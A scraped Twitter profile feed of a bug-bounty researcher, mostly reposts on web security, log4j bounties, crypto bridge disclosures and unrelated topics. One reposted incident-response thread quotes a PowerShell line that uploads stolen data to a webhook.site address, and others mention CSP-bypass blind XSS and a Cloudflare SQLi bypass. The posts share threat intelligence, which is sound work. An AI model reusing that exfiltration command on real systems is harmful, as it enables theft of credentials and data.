blinkms's profile picture. `/ Security Researcher /` #infosec #bugbounty

blinkms

@blinkms

`/ Security Researcher /` #infosec #bugbounty

blinkms reposted

We (@akamai_research) often see these CSP bypass attempts. Example for googleapis.com w/OOB beaconing/blind XSS References: cspbypass.com github.com/renniepak/CSPB…

ryancbarnett's tweet image. We (@akamai_research) often see these CSP bypass attempts. 
Example for googleapis.com w/OOB beaconing/blind XSS
References:
cspbypass.com
github.com/renniepak/CSPB…
ryancbarnett's tweet image. We (@akamai_research) often see these CSP bypass attempts. 
Example for googleapis.com w/OOB beaconing/blind XSS
References:
cspbypass.com
github.com/renniepak/CSPB…

blinkms reposted

Inner peace is the new success.


Do you remember when you joined Twitter? I do! #MyTwitterAnniversary

blinkms's tweet image. Do you remember when you joined Twitter? I do! #MyTwitterAnniversary

blinkms reposted

1/ Using webhooks to dump stolen credentials or information about a compromised system is not new. [1] In an incident a few weeks ago, we also saw a PSH script that used this mechanism: New-Object System.Net.WebClient).UploadString("webhook.site/f9f270f7-f..") 🧵

malmoeb's tweet image. 1/ Using webhooks to dump stolen credentials or information about a compromised system is not new. [1] 

In an incident a few weeks ago, we also saw a PSH script that used this mechanism:

New-Object System.Net.WebClient).UploadString("webhook.site/f9f270f7-f..")

🧵

blinkms reposted

Checks & Imbalances: Pelosi Talks Stocks trib.al/hyA2k2e by @Z_Everson


blinkms reposted

Uber investigating 'cybersecurity incident' after report of breach reut.rs/3qJl4O6

Reuters's tweet image. Uber investigating 'cybersecurity incident' after report of breach reut.rs/3qJl4O6

blinkms reposted

Reported 2 critical bugs to @InterlayHQ through @immunefi All issue fixed, no funds lost🥳 The #Bitcoin bridge of @harmonyprotocol shares the design, are they #SAFU? 🤡pwning.mirror.xyz/jlT8OgtwN3mQf3…


blinkms reposted

You can read @PwningEth's blogpost of the responsible disclosure here: pwning.mirror.xyz/okyEG4lahAuR81…


blinkms reposted

What happened is scientists discovered chlorofluorocarbons were bad for the ozone, countries believed them, the Montreal Protocol was signed, and CFC use fell by 99.7%, leading to the stabilization of the ozone layer, perhaps the greatest example of global cooperation in history.

Remember when they spent years telling us to panic over the hole in the ozone layer and then suddenly just stopped talking about it and nobody ever mentioned the ozone layer again?



blinkms reposted

Look at yourself, examine what needs to grow, but make sure the inner work doesn’t become another way to beat yourself up.


What's up ? Researchers , Any one out there for #android #bug collaboration #bugbounty


blinkms reposted

🥵Busy week at @Hacker0x01 helping customers eliminate exposure to #log4j vuln: - 1000+ vulnerability reports submitted 🗒️ - 400+ hackers submitted 🕵️‍♀️ - 75 confirmed and awarded (more pending) - $142,250 paid out 💰

Hacker0x01's tweet image. 🥵Busy week at @Hacker0x01 helping customers eliminate exposure to #log4j vuln:
- 1000+ vulnerability reports submitted 🗒️
- 400+ hackers submitted 🕵️‍♀️
- 75 confirmed and awarded (more pending)
- $142,250 paid out  💰

blinkms reposted

CVE-2021-45046 is vulnerable when attackers can control **non-message** parts of the pattern layout. Here are some examples 🧵


blinkms reposted

Cloudflare SQLi bypass

Vulnmachines's tweet image. Cloudflare SQLi bypass

blinkms reposted

Black Friday warmup🔥 Get a chance to win a SecurityTrails swag pack: Comfy t-shirt ✔️ Classic (and a favorite) hacker hoodie ✔️ Stickers ✔️ Just RT this tweet and make sure to follow @securitytrails - one winner will be chosen randomly on November 26th 2021 at 00:00 EST.

securitytrails's tweet image. Black Friday warmup🔥

Get a chance to win a SecurityTrails swag pack:
Comfy t-shirt ✔️
Classic (and a favorite) hacker hoodie ✔️
Stickers ✔️

Just RT this tweet and make sure to follow @securitytrails - one winner will be chosen randomly on November 26th 2021 at 00:00 EST.

blinkms reposted
PolyNetwork2's tweet image.

blinkms reposted

Rihanna as the weed fairy for Halloween in 2012

svrinx's tweet image. Rihanna as the weed fairy for Halloween in 2012
svrinx's tweet image. Rihanna as the weed fairy for Halloween in 2012

Loading...

Something went wrong.


Something went wrong.